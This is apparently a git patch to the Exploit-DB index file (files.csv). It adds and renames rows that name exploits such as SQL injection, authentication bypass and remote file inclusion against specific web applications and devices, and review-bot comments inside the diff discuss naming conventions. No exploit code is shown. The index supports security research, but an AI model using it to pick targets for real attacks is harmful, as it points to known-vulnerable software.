From bac881f89a412504b3864e5cb7aefcdddd6c6f8c Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 3 Jan 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-01-03 3 new exploits QNAP NAS Devices - Heap Overflow Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH) PHPFanBase 2.x - (protection.php) Remote File Inclusion PHPFanBase 2.x - 'protection.php' Remote File Inclusion DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection DigiAffiliate 1.4 - 'id' Parameter SQL Injection ExoPHPDesk 1.2.1 - (faq.php) SQL Injection ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection MiniGal b13 - (image backdoor) Remote Code Execution MiniGal b13 - Remote Code Execution PHP Auto Listings - 'moreinfo.php pg' SQL Injection Pre Simple CMS - SQL Injection (Authentication Bypass) PHP Auto Listings - 'pg' Parameter SQL Injection Pre Simple CMS - Authentication Bypass Harlandscripts drinks - (recid) SQL Injection Harlandscripts drinks - 'recid' Parameter SQL Injection Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection Mole Group Taxi Calc Dist Script - Authentication Bypass DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection DevelopItEasy Membership System 1.3 - Authentication Bypass NICE FAQ Script - (Authentication Bypass) SQL Injection NICE FAQ Script - Authentication Bypass SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection SoftComplex PHP Image Gallery 1.0 - Authentication Bypass DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection SoftComplex PHP Image Gallery - (ctg) SQL Injection DELTAScripts PHP Classifieds 7.5 - Authentication Bypass DELTAScripts PHP Links 1.3 - Authentication Bypass DELTAScripts PHP Shop 1.0 - Authentication Bypass SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection TurnkeyForms Business Survey Pro 1.0 - 'id' SQL 
Injection Mole Group Pizza - (manufacturers_id) Script SQL Injection TurnkeyForms Business Survey Pro 1.0 - 'id' Parameter SQL Injection Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection PHP Auto Listings Script - (Authentication Bypass) SQL Injection Mole Group Rental Script - (Authentication Bypass) SQL Injection MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection E-topbiz Online Store 1 - Authentication Bypass PHP Auto Listings Script - Authentication Bypass Mole Group Rental Script - Authentication Bypass MyioSoft Ajax Portal 3.0 - Authentication Bypass MyioSoft EasyBookMarker 4.0 - Authentication Bypass MyioSoft EasyCalendar - Authentication Bypass E-topbiz Online Store 1 - 'cat_id' SQL Injection E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection Myiosoft EasyBookMarker 4 - (Parent) SQL Injection Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection DigiAffiliate 1.4 - Authentication Bypass Mole Group Airline Ticket Script - Authentication Bypass ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection ExoPHPDesk 1.2 Final - Authentication Bypass ZEEMATRI 3.0 - 'adid' Parameter SQL Injection Joomla! Component com_books - (book_id) SQL Injection Joomla! Component com_books - 'book_id' Parameter SQL Injection Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection Joomla! 
/ Mambo Component com_catalogproduction - 'id' Parameter SQL Injection PozScripts Business Directory Script - 'cid' SQL Injection PozScripts Business Directory Script - 'cid' Parameter SQL Injection Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection Quick Poll Script - 'code.php id' SQL Injection Alstrasoft Web Host Directory - Authentication Bypass Quick Poll Script - 'id' Parameter SQL Injection Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection Bankoi Webhost Panel 1.20 - Authentication Bypass Minigal b13 - 'index.php list' Remote File Disclosure yahoo answers - 'id' SQL Injection Minigal b13 - Remote File Disclosure yahoo answers - 'id' Parameter SQL Injection PHPstore Wholesale - 'track.php?id' SQL Injection PHPstore Wholesale - 'id' Parameter SQL Injection E-topbiz ADManager 4 - (group) Blind SQL Injection E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion Jadu Galaxies - 'categoryId' Blind SQL Injection PHPfan 3.3.4 - 'init.php' Remote File Inclusion Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection MemHT Portal 4.0.1 - (avatar) Remote Code Execution MemHT Portal 4.0.1 - Remote Code Execution MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit MemHT Portal 4.0.1 - Delete All Private Messages Exploit MyioSoft Ajax Portal 3.0 - (page) SQL Injection MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection X10media Mp3 Search Engine < 1.6.2 Admin Access X10media Mp3 Search Engine < 1.6.2 - Admin Access Arab Portal 2.2 - (Authentication Bypass) SQL Injection Arab Portal 2.2 - Authentication Bypass Arab Portal 2.x - (forum.php qc) SQL Injection Arab Portal 2.x - 'forum.php' SQL Injection Arab Portal 2.2 - (mod.php module) Local File Inclusion Arab Portal 2.2 - 'mod.php' Local File Inclusion Collabtive - SQL Injection Collabtive 0.65 - SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection All Enthusiast 
ReviewPost PHP Pro 2.5 - showcat.php SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection Collabtive 1.0 - 'manageuser.php' SQL Injection Arab Portal 2.0 - Link.php SQL Injection Arab Portal 2.0 - 'Link.php' SQL Injection Arab Portal System 2.0 - online.php title Parameter Cross-Site Scripting Arab Portal System 2.0 - download.php title Parameter Cross-Site Scripting Arab Portal 2.0 - 'online.php' Cross-Site Scripting Arab Portal 2.0 - 'download.php' Cross-Site Scripting ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection Collabtive 1.1 - 'managetimetracker.php' SQL Injection Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass Zeeways Shaadi Clone 2.0 - Authentication Bypass PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution
---
files.csv | 126 +++++------
platforms/linux/dos/40985.txt | 333 +++++++++++++++++++++++++++++
platforms/multiple/remote/31715.pl | 70 ------
platforms/php/webapps/40986.py | 208 ++++++++++++++++++
platforms/windows/remote/40984.py | 161 ++++++++++++++
5 files changed, 766 insertions(+), 132 deletions(-)
create mode 100755 platforms/linux/dos/40985.txt
delete mode 100755 platforms/multiple/remote/31715.pl
create mode 100755 platforms/php/webapps/40986.py
create mode 100755 platforms/windows/remote/40984.py
diff --git a/files.csv b/files.csv
index bea47ac47..bb964c279 100644
--- a/files.csv
+++ b/files.csv
@@ -5331,6 +5331,7 @@ id,file,description,date,author,platform,type,port
 40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
 40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
 40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
+40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
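Review bot: The new 40985 row carries no affected version in its description, while every neighbouring row in this hunk pins one (`macOS 10.12.1 / iOS < 10.2`, `FTPShell Server 6.36`, `Linux Kernel < 2.4.20`), so the index cannot tell a reader which QNAP firmware is exploitable. If 40985.txt names the vulnerable firmware or QTS range, carry it into the description in the same `Product Version - Vuln` form the other rows use, e.g. `"QNAP NAS Devices <affected range> - Heap Overflow"`. The row is also filed with type `dos`; it is worth confirming against the writeup that the PoC only crashes the service, since a heap overflow that reaches code execution would be mis-categorised under `dos`.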
@@ -13952,7 +13953,6 @@ id,file,description,date,author,platform,type,port
 31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote,0
 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0
-31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow",2008-11-11,"raveen Darshanam",multiple,remote,0
 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090
 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555
 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0
@@ -15198,6 +15198,7 @@ id,file,description,date,author,platform,type,port
 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
 40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
 40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
+40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -17058,7 +17059,7 @@ id,file,description,date,author,platform,type,port
 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0
 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - (buycd.php) Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
-2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - (protection.php) Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0
+2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0
 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0
 2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0
 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0
@@ -17174,7 +17175,7 @@ id,file,description,date,author,platform,type,port
 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0
 3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) SQL Injection",2007-01-12,chernobiLe,php,webapps,0
 3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0
-3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection",2007-01-13,ajann,asp,webapps,0
+3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' Parameter SQL Injection",2007-01-13,ajann,asp,webapps,0
 3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion",2007-01-13,ajann,php,webapps,0
 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0
 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
@@ -17235,7 +17236,7 @@ id,file,description,date,author,platform,type,port
 3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0
 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps,0
 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0
-3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - (faq.php) SQL Injection",2007-01-31,ajann,php,webapps,0
+3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection",2007-01-31,ajann,php,webapps,0
 3235,platforms/php/webapps/3235.txt,"phpBB Tweaked 3 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0
 3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0
 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,php,webapps,0
@@ -17556,7 +17557,7 @@ id,file,description,date,author,platform,type,port
 3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0
 3752,platforms/php/webapps/3752.txt,"AjPortal2Php - (PagePrefix) Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps,0
 3753,platforms/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - (CAltInstaller.php) Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0
-3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0
+3754,platforms/php/webapps/3754.pl,"MiniGal b13 - Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0
 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0
 3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - (shout.php) Remote Code Injection",2007-04-17,Gammarays,php,webapps,0
 3759,platforms/php/webapps/3759.pl,"Joomla! Component Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0
@@ -19884,33 +19885,33 @@ id,file,description,date,author,platform,type,port
 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0
 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0
 7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0
-7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0
-7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
+7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'pg' Parameter SQL Injection",2008-11-05,G4N0K,php,webapps,0
+7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - Authentication Bypass",2008-11-05,"Hussin X",php,webapps,0
 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
-7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
+7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - 'recid' Parameter SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
-7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
+7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - Authentication Bypass",2008-11-05,InjEctOr5,php,webapps,0
 7011,platforms/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - (Local File Inclusion) Code Execution",2008-11-05,~elmysterio,php,webapps,0
 7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps,0
 7013,platforms/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injections",2008-11-06,InjEctOr5,php,webapps,0
 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
-7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
+7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - Authentication Bypass",2008-11-06,InjEctOr5,php,webapps,0
 7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
 7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,php,webapps,0
-7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - (Authentication Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0
+7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - Authentication Bypass",2008-11-06,r45c4l,php,webapps,0
 7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0
 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0
-7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,Cyber-Zone,php,webapps,0
+7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - Authentication Bypass",2008-11-06,Cyber-Zone,php,webapps,0
 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final - Arbitrary File Delete",2008-11-06,cOndemned,php,webapps,0
-7023,platforms/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
-7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
-7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0
-7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - (ctg) SQL Injection",2008-11-06,"Hussin X",php,webapps,0
+7023,platforms/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0
+7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0
+7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps,0
+7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection",2008-11-06,"Hussin X",php,webapps,0
 7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - Cross-Site Scripting / SQL Injection",2008-11-06,G4N0K,php,webapps,0
 7028,platforms/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0
-7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps,0
-7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - (manufacturers_id) Script SQL Injection",2008-11-07,InjEctOr5,php,webapps,0
+7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' Parameter SQL Injection",2008-11-07,G4N0K,php,webapps,0
+7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection",2008-11-07,InjEctOr5,php,webapps,0
 7031,platforms/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusion",2008-11-07,StAkeR,php,webapps,0
 7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0
 7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0
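Review bot: The renamed rows 7004, 7010, 7015, 7018, 7021 and 7023–7025 drop `SQL Injection` from their descriptions and keep only the impact, `Authentication Bypass`, so a search of this index for SQL injection in those products no longer returns them, and they become indistinguishable from rows that were always plain `Authentication Bypass` (7005, 7008). Row 7017 in the same hunk already uses the form that keeps both the impact and the class, `Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting`; I would rename to e.g. `"Pre Simple CMS - Authentication Bypass / SQL Injection"` and do the same for the others. Row 7003 likewise trades `'moreinfo.php pg'` for `'pg' Parameter`, discarding the script name, so the row no longer says where the parameter lives; keeping the file in the description, e.g. `"PHP Auto Listings - 'moreinfo.php' 'pg' Parameter SQL Injection"`, would preserve that without breaking the new `'x' Parameter` convention.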
@@ -19919,33 +19920,33 @@ id,file,description,date,author,platform,type,port
 7038,platforms/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
 7039,platforms/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
 7040,platforms/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0
-7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - (Authentication Bypass) SQL Injection",2008-11-07,r45c4l,php,webapps,0
-7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - (Authentication Bypass) SQL Injection",2008-11-07,Cyber-Zone,php,webapps,0
-7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
+7041,platforms/php/webapps/7041.txt,"E-topbiz Online Store 1 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
+7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - Authentication Bypass",2008-11-07,r45c4l,php,webapps,0
+7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - Authentication Bypass",2008-11-07,Cyber-Zone,php,webapps,0
+7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
+7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker 4.0 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
+7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - Authentication Bypass",2008-11-07,ZoRLu,php,webapps,0
 7047,platforms/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0
-7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps,0
+7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection",2008-11-07,Stack,php,webapps,0
 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting",2008-11-07,ahmadbady,php,webapps,0
 7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps,0
 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0
-7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0
+7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection",2008-11-07,G4N0K,php,webapps,0
 7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0
 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting",2008-11-08,ZoRLu,php,webapps,0
-7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0
-7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0
+7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0
+7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,php,webapps,0
 7062,platforms/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
-7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
-7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0
+7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - Authentication Bypass",2008-11-08,d3b4g,asp,webapps,0
